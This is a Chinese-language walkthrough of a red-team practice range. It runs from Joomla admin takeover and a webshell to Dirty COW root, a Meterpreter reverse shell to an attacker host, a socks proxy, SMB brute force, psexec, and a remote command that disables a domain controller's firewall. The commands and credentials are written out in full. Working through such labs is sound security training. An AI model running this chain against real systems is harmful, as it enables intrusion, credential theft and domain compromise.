ATT—CK红队评估实战内网靶场3

环境搭建

靶机解压打开都是挂起状态，直接打开即可

网络拓扑如下

信息收集

nmap扫描

访问网站，发现是joomla，joomscan扫描

joomscan -u http://192.168.1.110

查看配置文件，得到数据库账户密码

连上，找到数据库里的账户密码存放文件

搜索joomla管理员恢复密码，找到密码存放规则

sql执行添加管理员用户

INSERT INTO `am2zu_users` (`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`) VALUES ('Administrator2', 'admin','d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());
INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`) VALUES (LAST_INSERT_ID(),'8');

登录，后台模板修改文件，

注入webshell

也可以使用cve-2021-23132 POC

蚁剑连接上后发现限制了命令执行，绕过disable_functions

发现是ubuntu主机，但是只有一个网卡，并且是内网ip

确定采用了反向代理

内网渗透

CentOS

在/tmp/mysql下发现ubuntu ssh账户密码

连上以后，SUID不能提权

Linux kernel =2.6.32 > 2.6.22，在脏牛范围内，尝试脏牛提权

成功提权

msf生成linux马

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=4444 -f elf > a.elf

上传到ubuntu，授权执行

msf开启监听

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.1.3
set LPORT 4444
exploit

添加路由

route add 192.168.93.0 255.255.255.0 4（id）
route print

earthworm搭建socks5反向代理服务

kali执行

./ew_for_linux64 -s rcsocks -l 1080 -e 1234

CentOS执行

./ew_for_linux64 -s rssocks -d 192.168.1.3   -e 1234

扫描内网主机存活

use auxiliary/scanner/discovery/udp_probe
set rhosts 192.168.93.0/24
set threads 5
run

得到

[+] Discovered DNS on 192.168.93.10:53 (Microsoft DNS)
[+] Discovered NetBIOS on 192.168.93.10:137 (WIN-8GA56TNV3MV:<20>:U :WIN-8GA56TNV3MV:<00>:U :TEST:<00>:G :TEST:<1c>:G :TEST:<1b>:U :00:0c:29:1f:54:d2)
[+] Discovered NTP on 192.168.93.10:123 (1c0104fa00000000000a04034c4f434ceaddc1712b4a82dbc54f234b71b152f3eaddc1758f63164feaddc1758f63164f)
[+] Discovered MSSQL on 192.168.93.20:1434 (ServerName=WIN2008 InstanceName=MSSQLSERVER IsClustered=No Version=10.0.1600.22 tcp=1433 )
[+] Discovered NetBIOS on 192.168.93.20:137 (WIN2008:<00>:U :TEST:<00>:G :WIN2008:<20>:U :00:0c:29:ab:44:ec)
[*] Scanned  26 of 256 hosts (10% complete)
[+] Discovered NetBIOS on 192.168.93.30:137 (WIN7:<20>:U :WIN7:<00>:U :TEST:<00>:G :TEST:<1e>:G :TEST:<1d>:U :__MSBROWSE__:<01>:G :00:0c:29:e0:74:2b)

存在3个主机，namp扫描

proxychains4 nmap -Pn -sT -sV 192.168.93.10 192.168.93.20 192.168.93.30 -F

192.168.93.10开放53端口，域控主机

利用msf模块进行进行SMB爆破PC主机密码

use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.93.30
set PASS_FILE /home/a/桌面/fuzzDicts/passwordDict/top500.txt
set SMBUser administrator
exploit

爆破win 2008主机密码

set RHOSTS 192.168.93.20
exploit

爆破win 2012主机密码

set RHOSTS 192.168.93.10
exploit

得到其中一个shell,也可得到密码

PC

使用msf自带模块进行攻击

use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp
set SMBUser administrator
set SMBPass 123qwe!ASD
set RHOSTS 192.168.93.30
exploit

win2008

set RHOSTS 192.168.93.20
exploit

win2012（域控）

法一

set RHOSTS 192.168.93.10
set SMBPass zxcASDqw123!!
exploit

有防火墙，失败

连接到win2008,迁移到域用户程序，成功访问域控

关闭防火墙

sc \\192.168.93.10 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\192.168.93.10 start unablefirewall

再执行，成功getshell

法二

或者使用另外一种方法

使用impacket包中的wmiexec工具，这里我用的0.9.24的文件，Releases · fortra/impacket (github.com)，最新0.12和0.9.19文件都不行

python wmiexec.py 'administrator:zxcASDqw123!!@192.168.93.10'

参考：

ATT&CK红队评估（红日靶场三） - FreeBuf网络安全行业门户

记一次靶场内网渗透（四） (qq.com)

ATK&CK红队评估实战靶场（三） - FreeBuf网络安全行业门户